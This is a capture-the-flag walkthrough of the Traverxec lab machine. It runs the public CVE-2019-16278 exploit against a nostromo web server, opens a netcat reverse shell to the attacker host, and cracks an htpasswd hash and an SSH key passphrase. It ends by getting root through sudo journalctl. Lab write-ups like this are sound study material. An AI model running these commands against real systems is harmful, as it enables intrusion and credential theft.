Traverxec
Contents
Ports scan
u505@kali:~/HTB/Machines/Traverxec$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.165
Starting masscan 1.0.5 at 2020-04-30 14:50:58 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.165 Discovered open port 80/tcp on 10.10.10.165
u505@kali:~/HTB/Machines/Traverxec$ nmap -sC -sV 10.10.10.165 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:50 EDT Nmap scan report for traverxec.htb (10.10.10.165) Host is up (0.044s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA) |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519) 80/tcp open http nostromo 1.9.6 |_http-server-header: nostromo 1.9.6 |_http-title: TRAVERXEC Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
Web Server
From https://en.wikipedia.org/wiki/Nhttpd
nhttpd is an open-source web server, also known as the Nostromo web server, designed by Marcus Glocker. It runs as a single process, and handles normal concurrent connections by select calls, but for efficiency during more demanding connections such as directory listings and CGI execution it forks. It supports HTTP/1.1 and CGI/1.1, Basic access authentication, SSL, IPv6, custom responses, aliases and virtual hosts. Security measures include running setuid and chrooting. Public access is controlled using the world readable flags and CGI execution by the world executable flags of the file system permissions.
CVE-2019-16278
u505@kali:~/HTB/Machines/Traverxec$ searchsploit nostromo
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Trav | exploits/linux/remote/35466.sh
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Traverxec$ searchsploit -m 47837
Exploit: nostromo 1.9.6 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47837
Path: /usr/share/exploitdb/exploits/multiple/remote/47837.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Traverxec/47837.py
We can test the exploit.
u505@kali:~/HTB/Machines/Traverxec$ python 47837.py 10.10.10.165 80 whoami
_____-2019-16278 _____ _______ ______ _____\ \ _____\ \_\ | | | / / | | / /| || / / /|/ / /___/| / / /____/||\ \ \ |/| |__ |___|/ | | |____|/ \ \ \ | | | \ | | _____ \| \| | | __/ __ |\ \|\ \ |\ /| |\ \ / \ | \_____\| | | \_______/ | | \____\/ | | | /____/| \ | | / | | |____/| \|_____| || \|_____|/ \|____| | | |____|/ |___|/
HTTP/1.1 200 OK Date: Thu, 30 Apr 2020 15:23:26 GMT Server: nostromo 1.9.6 Connection: close
www-data
Reverse shell
We start the listener.
u505@kali:~/HTB/Machines/Traverxec$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And we execute the exploit.
u505@kali:~/HTB/Machines/Traverxec$ python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4444 >/tmp/f"
_____-2019-16278 _____ _______ ______ _____\ \ _____\ \_\ | | | / / | | / /| || / / /|/ / /___/| / / /____/||\ \ \ |/| |__ |___|/ | | |____|/ \ \ \ | | | \ | | _____ \| \| | | __/ __ |\ \|\ \ |\ /| |\ \ / \ | \_____\| | | \_______/ | | \____\/ | | | /____/| \ | | / | | |____/| \|_____| || \|_____|/ \|____| | | |____|/ |___|/
The shell appears on our listener.
u505@kali:~/HTB/Machines/Traverxec$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.165. Ncat: Connection from 10.10.10.165:34512. /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" www-data@traverxec:/usr/bin$ uname -a uname -a Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
Enumeration
Copy LinEnum and pspy64
u505@kali:~/HTB/Machines/Traverxec$ mkdir www u505@kali:~/HTB/Machines/Traverxec$ cd www/ u505@kali:~/HTB/Machines/Traverxec/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Traverxec/www$ cp /opt/utils/pspy/pspy64 ./
Start web server
u505@kali:~/HTB/Machines/Traverxec/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target, we download the files
www-data@traverxec:/tmp$ wget -r http://10.10.14.17/ wget -r http://10.10.14.17/ --2020-04-30 11:38:01-- http://10.10.14.17/ Connecting to 10.10.14.17:80... connected. HTTP request sent, awaiting response... 200 OK Length: 250 [text/html] Saving to: '10.10.14.17/index.html'
10.10.14.17/index.h 100%[===================>] 250 --.-KB/s in 0s
2020-04-30 11:38:01 (29.5 MB/s) - '10.10.14.17/index.html' saved [250/250]
Loading robots.txt; please ignore errors. --2020-04-30 11:38:01-- http://10.10.14.17/robots.txt Connecting to 10.10.14.17:80... connected. HTTP request sent, awaiting response... 404 File not found 2020-04-30 11:38:01 ERROR 404: File not found.
--2020-04-30 11:38:01-- http://10.10.14.17/LinEnum.sh Connecting to 10.10.14.17:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46631 (46K) [text/x-sh] Saving to: '10.10.14.17/LinEnum.sh'
10.10.14.17/LinEnum 100%[===================>] 45.54K --.-KB/s in 0.09s
2020-04-30 11:38:01 (526 KB/s) - '10.10.14.17/LinEnum.sh' saved [46631/46631]
--2020-04-30 11:38:01-- http://10.10.14.17/pspy64 Connecting to 10.10.14.17:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: '10.10.14.17/pspy64'
10.10.14.17/pspy64 100%[===================>] 2.94M 3.91MB/s in 0.8s
2020-04-30 11:38:02 (3.91 MB/s) - '10.10.14.17/pspy64' saved [3078592/3078592]
FINISHED --2020-04-30 11:38:02-- Total wall clock time: 1.2s Downloaded: 3 files, 3.0M in 0.8s (3.56 MB/s)
Files rights are updated.
www-data@traverxec:/tmp$ cd 10.10.14.17 cd 10.10.14.17 www-data@traverxec:/tmp/10.10.14.17$ chmod +x LinEnum.sh pspy64 chmod +x LinEnum.sh pspy64
We run the enumeration
www-data@traverxec:/tmp/10.10.14.17$ ./LinEnum.sh ... [-] htpasswd found - could contain passwords: /var/nostromo/conf/.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
The enumeration finds an htpasswd file.
Crack the htpasswd file
u505@kali:~/HTB/Machines/Traverxec$ cat hash
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
u505@kali:~/HTB/Machines/Traverxec$ hashcat -m 500 hash --session traverxec --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
u505@kali:~/HTB/Machines/Traverxec$ hashcat -m 500 hash --session traverxec --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
I tried to ssh with this password, but I was unsuccessful.
User folder
With the htpassword in mind, we check the nostromo config file
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf cat nhttpd.conf # MAIN [MANDATORY]
servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home homedirs_public public_www
It shows, there are home directories, and the user david has it.
u505@kali:~/HTB/Machines/Traverxec$ curl http://traverxec.htb/~david/
<html>
<head>
<style>
html {
font-family: sans-serif;
color: rgb(128,96,0);
background: url(/img/portfolio/portfolio_03.jpg) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
</style>
</head><body><font style="sans-serif"><h1>Private space.<br>Nothing here.<br>Keep out!</h1></body></html>
The page doesn't show anything, except the nostromo server user www-data should have access to the folder public_www on the user folder.
www-data@traverxec:/usr/bin$ ls -l /home/david/public_www ls -l /home/david/public_www total 8 -rw-r--r-- 1 david david 402 Oct 25 2019 index.html drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area www-data@traverxec:/usr/bin$ ls -l /home/david/public_www/protected-file-area ls -l /home/david/public_www/protected-file-area total 4 -rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz
We copy the backup file.
www-data@traverxec:/tmp$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz ./
And extract it.
www-data@traverxec:/tmp$ tar xvfz backup-ssh-identity-files.tgz tar xvfz backup-ssh-identity-files.tgz home/david/.ssh/ home/david/.ssh/authorized_keys home/david/.ssh/id_rsa home/david/.ssh/id_rsa.pub www-data@traverxec:/tmp$ cat home/david/.ssh/id_rsa cat home/david/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7 HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN 6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1 Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6 i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s 9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua 4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU /8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+ XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w -----END RSA PRIVATE KEY-----
Try to ssh using the decrypted htpasswd user.
u505@kali:~/HTB/Machines/Traverxec$ vi rsa_david u505@kali:~/HTB/Machines/Traverxec$ chmod 600 rsa_david u505@kali:~/HTB/Machines/Traverxec$ ssh -i rsa_david david@10.10.10.165 Enter passphrase for key 'rsa_david': Enter passphrase for key 'rsa_david': Enter passphrase for key 'rsa_david': david@10.10.10.165's password: Permission denied, please try again. david@10.10.10.165's password:
But it fails.
Alternative way to obtain the ssh key file
We can access by web to the folder protected-file-area, using the user david and the password that we decrypted before, but that means that we found the folder with an ls, so it was easier to directly copy the file form command line.
User flag
With the ssh key, we should be able to ssh as david, but we need to brute force the passphrase of the key file.
Crack the passphrase of the key file
u505@kali:~/HTB/Machines/Traverxec$ /usr/share/john/ssh2john.py rsa_david >rsa_david.hash
u505@kali:~/HTB/Machines/Traverxec$ john rsa_david.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (rsa_david)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-04-30 14:32) 0.3984g/s 5713Kp/s 5713Kc/s 5713KC/s *7¡Vamos!
Session completed
User Flag
u505@kali:~/HTB/Machines/Traverxec$ ssh -i rsa_david david@10.10.10.165 Enter passphrase for key 'rsa_david': Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 david@traverxec:~$ cat user.txt <USER_FLAG>
Escalation of privileges
A simple ls shows a bin folder.
david@traverxec:~$ ls -ltr
total 12
drwxr-xr-x 3 david david 4096 Oct 25 2019 public_www
-r--r----- 1 root david 33 Oct 25 2019 user.txt
drwx------ 2 david david 4096 Oct 25 2019 bin
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls -l
total 8
-r-------- 1 david david 802 Oct 25 2019 server-stats.head
-rwx------ 1 david david 363 Oct 25 2019 server-stats.sh
david@traverxec:~/bin$ cat server-stats.head
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'
Le shell script do a sudo with the command journalctl.
david@traverxec:~/bin$ cat server-stats.sh #!/bin/bash
cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Searching into GTFOBins, we find that we can spawn a shell from journalctl because it invokes less and less can spawn an interactive shell.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Thu 2020-04-30 10:53:32 EDT, end at Thu 2020-04-30 14:51:34 EDT. -- Apr 30 12:05:55 traverxec sudo[1807]: pam_unix(sudo:auth): authentication failure; logname= u Apr 30 12:05:57 traverxec sudo[1807]: pam_unix(sudo:auth): conversation failed Apr 30 12:05:57 traverxec sudo[1807]: pam_unix(sudo:auth): auth could not identify password f Apr 30 12:05:57 traverxec sudo[1807]: www-data : command not allowed ; TTY=pts/0 ; PWD=/tmp/1 Apr 30 12:05:57 traverxec crontab[1868]: (www-data) LIST (www-data) !whoami root !done (press RETURN) !/bin/bash root@traverxec:/home/david/bin# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 16:14, 30 April 2020 (EDT)
